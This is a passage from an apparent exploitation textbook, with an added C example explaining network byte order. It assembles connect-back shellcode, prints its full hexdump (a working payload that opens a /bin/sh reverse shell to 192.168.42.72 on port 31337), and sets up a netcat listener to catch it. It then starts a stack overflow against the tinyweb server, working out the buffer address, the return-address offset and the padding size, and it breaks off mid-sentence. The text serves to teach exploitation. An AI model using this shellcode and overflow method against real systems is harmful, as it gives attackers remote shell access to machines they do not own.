Since these values are stored in network byte order but the x86 architecture is little-endian, the stored DWORD appears reversed when read as a number. This means the DWORD for 192.168.42.72 is 0x482aa8c0. The same applies to the two-byte WORD used for the destination port. When the port number 31337 is printed in hexadecimal using gdb, the bytes are shown in little-endian order. This means the displayed bytes must be reversed, so the WORD for 31337 is 0x697a.
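The following C program is an added illustration of the byte-order point above; it is not code from the book. It builds the network-byte-order bytes of an IPv4 address and a TCP port by hand, then reads them back the way a little-endian CPU loads a DWORD or WORD, which reproduces the 0x482aa8c0 and 0x697a values gdb shows. The function names (ipv4_network_bytes, port_network_bytes, read_little_endian and the two *_as_x86_* helpers) are my own; htonl()/htons() from <arpa/inet.h> are used only as a cross-check, and the byte-reading logic is endian-independent so the result is the same on any host.

```c
/* Added worked example: network byte order vs. little-endian memory reads.
 * Not part of the original text; function names are illustrative. */
#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <arpa/inet.h>

/* Write the network-byte-order bytes of a dotted-quad IPv4 address into
 * out[4] (most significant octet first), exactly as sin_addr holds them.
 * Returns 1 on success, 0 if the string is not a valid dotted quad. */
int ipv4_network_bytes(const char *dotted, uint8_t out[4])
{
    unsigned o[4];
    char tail;
    /* A fifth conversion (%c) succeeding means trailing garbage: reject it. */
    if (sscanf(dotted, "%u.%u.%u.%u%c", &o[0], &o[1], &o[2], &o[3], &tail) != 4)
        return 0;
    for (int i = 0; i < 4; i++) {
        if (o[i] > 255)
            return 0;
        out[i] = (uint8_t)o[i];
    }
    return 1;
}

/* Write the network-byte-order bytes of a TCP port into out[2]. */
void port_network_bytes(uint16_t port, uint8_t out[2])
{
    out[0] = (uint8_t)(port >> 8);   /* high byte goes first on the wire */
    out[1] = (uint8_t)(port & 0xff);
}

/* Interpret up to four bytes the way a little-endian CPU (x86) loads them:
 * the first byte in memory becomes the least significant byte of the value.
 * This is the number gdb prints with "p/x" on such a machine. */
uint32_t read_little_endian(const uint8_t *p, size_t n)
{
    uint32_t v = 0;
    for (size_t i = 0; i < n && i < 4; i++)
        v |= (uint32_t)p[i] << (8 * i);
    return v;
}

/* The DWORD an x86 machine sees for an address stored in network order.
 * Returns 0 for an unparseable address. */
uint32_t ipv4_as_x86_dword(const char *dotted)
{
    uint8_t b[4];
    if (!ipv4_network_bytes(dotted, b))
        return 0;
    return read_little_endian(b, 4);
}

/* The WORD an x86 machine sees for a port stored in network order. */
uint16_t port_as_x86_word(uint16_t port)
{
    uint8_t b[2];
    port_network_bytes(port, b);
    return (uint16_t)read_little_endian(b, 2);
}

int main(void)
{
    uint8_t ip[4], pt[2];
    ipv4_network_bytes("192.168.42.72", ip);   /* sample values from the text */
    port_network_bytes(31337, pt);

    printf("192.168.42.72 in memory: %02x %02x %02x %02x -> x86 DWORD 0x%08x\n",
           ip[0], ip[1], ip[2], ip[3], ipv4_as_x86_dword("192.168.42.72"));
    printf("port 31337 in memory:    %02x %02x       -> x86 WORD  0x%04x\n",
           pt[0], pt[1], port_as_x86_word(31337));

    /* Cross-check: htonl()/htons() lay down the same bytes in memory,
     * whatever the host's native byte order. */
    uint32_t a = htonl(0xc0a82a48u);   /* 192.168.42.72 as a host-order number */
    uint16_t p = htons(31337);
    printf("htonl/htons bytes match: %s\n",
           (memcmp(&a, ip, 4) == 0 && memcmp(&p, pt, 2) == 0) ? "yes" : "no");
    return 0;
}
```

Running it prints the four address bytes as c0 a8 2a 48 and the two port bytes as 7a 69, followed by the reversed-looking DWORD and WORD, which is exactly the reversal the text describes: the bytes are not stored backwards, the CPU simply numbers them from the least significant end.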
The netcat program can also be used to listen for incoming connections
with the -l command-line option. This is used in the output below to listen
on port 31337 for the connect-back shellcode. The ifconfig command ensures
the IP address of eth0 is 192.168.42.72 so the shellcode can connect back to it.
reader@hacking:~/booksrc $ sudo ifconfig eth0 192.168.42.72 up
reader@hacking:~/booksrc $ ifconfig eth0
eth0 Link encap:Ethernet HWaddr 00:01:6C:EB:1D:50
inet addr:192.168.42.72 Bcast:192.168.42.255 Mask:255.255.255.0
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
Interrupt:16
reader@hacking:~/booksrc $ nc -v -l -p 31337
listening on [any] 31337 ...
Now, let's try to exploit the tinyweb server program using the connect-back shellcode. From working with this program before, we know that the request buffer is 500 bytes long and is located at 0xbffff5c0 in stack memory. We also know that the return address is found within 40 bytes of the end of the buffer.
reader@hacking:~/booksrc $ nasm connectback_shell.s
reader@hacking:~/booksrc $ hexdump -C connectback_shell
00000000 6a 66 58 99 31 db 43 52 6a 01 6a 02 89 e1 cd 80 |jfX.1.CRj.j.....|
00000010 96 6a 66 58 43 68 c0 a8 2a 48 66 68 7a 69 66 53 |.jfXCh..*HfhzifS|
00000020 89 e1 6a 10 51 56 89 e1 43 cd 80 87 f3 87 ce 49 |..j.QV..C......I|
00000030 b0 3f cd 80 49 79 f9 b0 0b 52 68 2f 2f 73 68 68 |.?..Iy...Rh//shh|
00000040 2f 62 69 6e 89 e3 52 89 e2 53 89 e1 cd 80 |/bin..R..S....|
0000004e
reader@hacking:~/booksrc $ wc -c connectback_shell
78 connectback_shell
reader@hacking:~/booksrc $ echo $(( 544 - (4*16) - 78 ))
402
reader@hacking:~/booksrc $ gdb -q --batch -ex "p /x 0xbffff5c0 + 200"
$1 = 0xbffff688
reader@hacking:~/booksrc $
Since the offset from the beginning of the buffer to the return address is
540 bytes, a total of 544 bytes must be written to overwrite the four-byte return
address. The return address overwrite also needs to be properly aligned, since